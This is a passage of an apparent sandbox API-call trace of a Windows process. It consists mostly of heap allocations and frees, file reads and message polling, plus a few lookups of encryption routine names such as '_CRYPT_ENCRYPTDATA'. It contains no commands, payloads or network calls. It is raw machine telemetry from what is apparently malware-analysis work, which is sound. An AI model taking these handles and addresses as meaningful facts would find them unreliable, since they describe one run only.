dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0099.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0099.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0099.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0099.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e02020 [0099.818] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0099.819] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0xde93, lpOverlapped=0x0) returned 1 [0099.821] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0099.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0099.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0099.821] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0099.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0099.821] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xde93) returned 0x4516010 [0099.822] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e02020 | out: hHeap=0x1780000) returned 1 [0099.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0099.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0099.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0099.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0099.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0099.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xde93) returned 0x4523eb0 [0099.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0099.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0099.931] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0099.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0099.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0099.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0099.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0099.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0099.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xde93) returned 0x4516010 [0099.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0099.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0099.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0099.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0099.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0099.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0099.931] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0099.931] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0099.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0099.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0099.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0099.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0099.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0099.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0099.934] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0099.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0099.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0099.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0099.934] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0099.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0099.934] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0099.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0099.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2660 [0099.934] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0099.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0099.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0099.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0099.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xde93) returned 0x4516010 [0099.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0099.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25f0 [0099.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0099.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0099.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0099.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2710 [0099.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0099.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0099.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0099.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2640 [0099.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0099.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0099.935] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0099.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca388 [0099.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0099.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0099.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0099.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0099.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0099.935] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xde93) returned 0x4531d50 [0099.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0099.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0099.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0099.936] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0099.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0099.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0099.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0099.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0099.936] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0099.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0099.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0099.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0099.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0099.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0099.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0099.937] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0099.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0099.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0099.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0099.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0099.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0099.937] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0099.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0099.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0099.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0099.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0099.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0099.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0099.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0099.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0099.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0099.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0099.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0099.937] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0099.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0099.937] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0099.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0099.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26a0 [0099.937] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0099.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0099.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0099.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0099.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca400 [0099.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0099.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0099.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0099.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0099.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0099.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0099.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0099.938] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0099.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0099.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0099.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0099.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0099.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0099.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0099.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0099.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0099.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0099.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0099.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0099.938] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0099.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797128 [0099.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0099.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0099.938] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0099.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0099.938] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0099.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0099.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0099.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0099.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0099.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0099.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0099.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0099.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0099.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0099.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0099.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0099.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0099.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0099.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0099.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0099.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0099.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0099.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0099.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0099.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0099.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0099.939] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0099.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0099.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0099.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0099.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0099.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0099.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0099.939] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0099.939] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0099.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0099.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0099.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0099.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918f8 [0099.940] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0099.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918f8 | out: hHeap=0x1780000) returned 1 [0099.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0099.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca580 [0099.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0099.940] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0099.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0099.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0099.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0099.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0099.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0099.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0099.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0099.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0099.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0099.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0099.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0099.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0099.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0099.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0099.940] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0099.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0099.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0099.940] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0099.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0099.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0099.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0099.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0099.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0099.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0099.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0099.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0099.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0099.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0099.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0099.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0099.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0099.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0099.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0099.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0099.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0099.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0099.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0099.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797028 [0099.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0099.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0099.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0099.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0099.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0099.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0099.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0099.941] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0099.941] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0099.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0099.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0099.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0099.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0099.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0099.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0099.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0099.942] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0099.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0099.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0099.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0099.942] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: 